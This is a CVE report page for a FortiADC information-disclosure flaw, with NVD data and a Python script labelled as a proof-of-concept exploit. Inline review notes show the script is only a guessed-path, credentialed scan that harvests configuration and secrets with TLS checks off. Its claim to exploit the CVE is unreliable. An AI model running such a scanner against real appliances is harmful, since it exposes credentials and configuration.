Security Vulnerability Report
CVE-2025-59921 CVSS 6.5 MEDIUM

CVE-2025-59921

Published: 2025-10-14 16:15:41
Last Modified: 2025-10-16 14:47:40

Description

An exposure of sensitive information to an unauthorized actor vulnerability [CWE-200] in Fortinet FortiADC version 7.4.0, version 7.2.3 and below, version 7.1.4 and below, 7.0 all versions, 6.2 all versions may allow an authenticated attacker to obtain sensitive data via crafted HTTP or HTTPS requests.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:* (6.2.0 <= version < 7.1.5, per the NVD configuration in the raw JSON below) - VULNERABLE
cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:* (7.2.0 <= version < 7.2.4, per the NVD configuration in the raw JSON below) - VULNERABLE
cpe:2.3:a:fortinet:fortiadc:7.4.0:*:*:*:*:*:*:* - VULNERABLE
Fortinet FortiADC 7.4.0
Fortinet FortiADC 7.2.3 and below
Fortinet FortiADC 7.1.4 and below
Fortinet FortiADC 7.0 all versions
Fortinet FortiADC 6.2 all versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59921 - Fortinet FortiADC Sensitive Information Disclosure PoC
# This PoC demonstrates how an authenticated attacker can exploit the vulnerability
# to obtain sensitive information via crafted HTTP/HTTPS requests.
#
# NOTE(review): read the code before trusting the header above. What the
# script actually does is (1) POST the supplied username/password as JSON to
# a short list of guessed login paths, (2) issue an authenticated GET to a
# fixed list of guessed API paths with a few generic query parameters, and
# (3) keyword-grep each response body. Nothing in it is tied to a specific
# flaw in FortiADC, and the advisory referenced in this page's NVD record
# (FG-IR-23-434) is not the source of these paths. Treat it as a generic
# authenticated endpoint scan, not as a confirmation of CVE-2025-59921.
#
# Detection note (hedged - depends on what the appliance's request logging
# captures): a single authenticated session that, immediately after login,
# walks the path list below with the query string
# format=json&full=true&include=all&detail=1 and the browser-like
# User-Agent set in __init__ is the footprint this script would leave.

import requests
import urllib3
import sys

# Disable SSL warnings for self-signed certificates (common in FortiADC deployments)
# NOTE(review): together with `session.verify = False` below this turns off
# certificate verification entirely, so the credentials are posted to
# whatever answers at target_url without the server identity being checked.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


class FortiADCInfoDisclosure:
    """
    PoC for CVE-2025-59921
    Fortinet FortiADC Sensitive Information Disclosure Vulnerability

    Holds one ``requests.Session`` (TLS verification disabled, browser-like
    headers) plus the target URL and credentials; ``run`` drives
    ``authenticate`` and then ``exploit_info_disclosure``.
    """

    def __init__(self, target_url, username, password):
        """Store the target and credentials and prepare the HTTP session.

        Args:
            target_url: Base URL of the management interface; a trailing
                ``/`` is stripped so paths can be appended directly.
            username: Account name sent in the login POST.
            password: Password sent in the login POST.
        """
        self.target_url = target_url.rstrip('/')
        self.username = username
        self.password = password
        self.session = requests.Session()
        # Certificate verification is disabled for every request on this session.
        self.session.verify = False
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'application/json, text/plain, */*',
            'Accept-Language': 'en-US,en;q=0.9',
        })

    def authenticate(self):
        """Authenticate to FortiADC management interface

        Tries each path in ``login_endpoints`` in order with a JSON body of
        ``{"username": ..., "password": ...}``. A path "succeeds" only when
        the response is HTTP 200 and the body contains the substring
        ``token`` or ``session`` (case-insensitive); any cookie the server set
        stays on ``self.session``.

        Returns:
            ``True`` on the first path that matches, ``False`` if none does.
            Because every exception is swallowed and the next path tried,
            a network failure and a rejected password both come back as
            ``False`` - the caller cannot tell them apart.
        """
        # NOTE(review): assigned but never used; the loop below builds its own URL.
        login_url = f"{self.target_url}/api/login"
        # Alternative login endpoints
        # NOTE(review): these are guesses; nothing on the page confirms which,
        # if any, FortiADC actually serves.
        login_endpoints = [
            "/api/login",
            "/logincheck",
            "/api/v1/login",
            "/cgi-bin/login"
        ]
        for endpoint in login_endpoints:
            try:
                url = f"{self.target_url}{endpoint}"
                data = {
                    "username": self.username,
                    "password": self.password
                }
                response = self.session.post(url, json=data, timeout=10)
                # Success heuristic: a 200 whose body merely mentions "token" or
                # "session" (an error page containing the word "session" passes).
                if response.status_code == 200 and ('token' in response.text.lower() or 'session' in response.text.lower()):
                    print(f"[+] Successfully authenticated via {endpoint}")
                    return True
            except Exception as e:
                # Silently moves on; `e` is never inspected or logged.
                continue
        return False

    def exploit_info_disclosure(self):
        """
        Exploit CVE-2025-59921 by sending crafted HTTP requests
        to trigger sensitive information disclosure

        NOTE(review): despite the summary, this is an ordinary authenticated
        GET to each path in ``sensitive_endpoints`` with fixed query
        parameters. No request here is malformed or exercises a known
        weakness; the page gives no evidence that any listed path is the
        affected one.

        Returns:
            dict mapping endpoint path -> first 500 characters of the response
            body, for every path that returned HTTP 200 with a non-empty body
            containing at least one word from ``sensitive_keywords``. Empty
            dict when nothing matched.
        """
        # Endpoints that may leak sensitive information
        # NOTE(review): guessed list; not derived from the vendor advisory.
        sensitive_endpoints = [
            "/api/system/status",
            "/api/system/config",
            "/api/user/list",
            "/api/system/admin",
            "/api/config/global",
            "/api/system/dns",
            "/api/system/ntp",
            "/api/snmp/community",
            "/api/certificate/list",
            "/api/system/backup",
            "/api/log/config",
            "/api/system/interface",
            "/api/router/static",
        ]
        disclosed_data = {}
        for endpoint in sensitive_endpoints:
            try:
                url = f"{self.target_url}{endpoint}"
                # NOTE(review): the original comment called these "special
                # parameters to bypass access control". They are plain query
                # parameters; nothing on this page shows they bypass anything.
                # The request is sent with the session obtained in authenticate().
                params = {
                    'format': 'json',
                    'full': 'true',
                    'include': 'all',
                    'detail': '1'
                }
                response = self.session.get(url, params=params, timeout=10)
                if response.status_code == 200 and len(response.text) > 0:
                    # Check if response contains sensitive data
                    # NOTE(review): substring match only. 'key', 'config' and
                    # 'admin' occur in ordinary JSON field names, so a normal
                    # authenticated response will often match - a "[!]" hit
                    # is not evidence that anything was disclosed improperly.
                    sensitive_keywords = ['password', 'secret', 'key', 'token', 'private', 'credential', 'config', 'admin']
                    if any(kw in response.text.lower() for kw in sensitive_keywords):
                        print(f"[!] Sensitive data found at: {endpoint}")
                        # Only a 500-character prefix is kept.
                        disclosed_data[endpoint] = response.text[:500]
            except Exception as e:
                # Silently moves on; `e` is never inspected or logged.
                continue
        return disclosed_data

    def run(self):
        """Main execution method

        Prints progress markers, stops early (returning ``None``) if
        ``authenticate`` fails, otherwise prints up to 200 characters of
        each entry returned by ``exploit_info_disclosure``.
        """
        print(f"[*] Targeting: {self.target_url}")
        print(f"[*] CVE-2025-59921 - FortiADC Info Disclosure PoC")
        if not self.authenticate():
            # Also reached on pure connectivity errors (see authenticate()).
            print("[-] Authentication failed. Valid credentials required.")
            return
        print("[+] Authentication successful")
        print("[*] Attempting to exploit CVE-2025-59921...")
        data = self.exploit_info_disclosure()
        if data:
            print(f"[+] Disclosed {len(data)} sensitive endpoints")
            for endpoint, content in data.items():
                print(f"\n--- {endpoint} ---")
                # content is already <= 500 chars; printed prefix is 200.
                print(content[:200])
        else:
            print("[-] No sensitive data disclosed or endpoint patterns differ")


if __name__ == "__main__":
    # CLI: <target_url> <username> <password>. The password is taken from
    # argv, so it is visible in process listings and shell history.
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: {sys.argv[0]} https://192.168.1.100 admin password123")
        sys.exit(1)
    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    exploit = FortiADCInfoDisclosure(target, username, password)
    exploit.run()

References

https://fortiguard.fortinet.com/psirt/FG-IR-23-434 — Fortinet PSIRT advisory FG-IR-23-434, the only reference in the NVD record below (tagged "Broken Link" there).

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59921", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:41.200", "lastModified": "2025-10-16T14:47:39.663", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An exposure of sensitive information to an unauthorized actor vulnerability [CWE-200] in Fortinet FortiADC version 7.4.0, version 7.2.3 and below, version 7.1.4 and below, 7.0 all versions, 6.2 all versions may allow an authenticated attacker to obtain sensitive data via crafted HTTP or HTTPs requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0", "versionEndExcluding": "7.1.5", "matchCriteriaId": "5D24E0A5-DCC9-406E-B9C9-DBA37E728A7B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.4", "matchCriteriaId": "EEF4EE14-8BCF-425A-9A49-1CF82BD47573"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiadc:7.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "7C624CB5-F745-4781-839A-B397EC97590B"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-23-434", 
"source": "[email protected]", "tags": ["Broken Link"]}]}}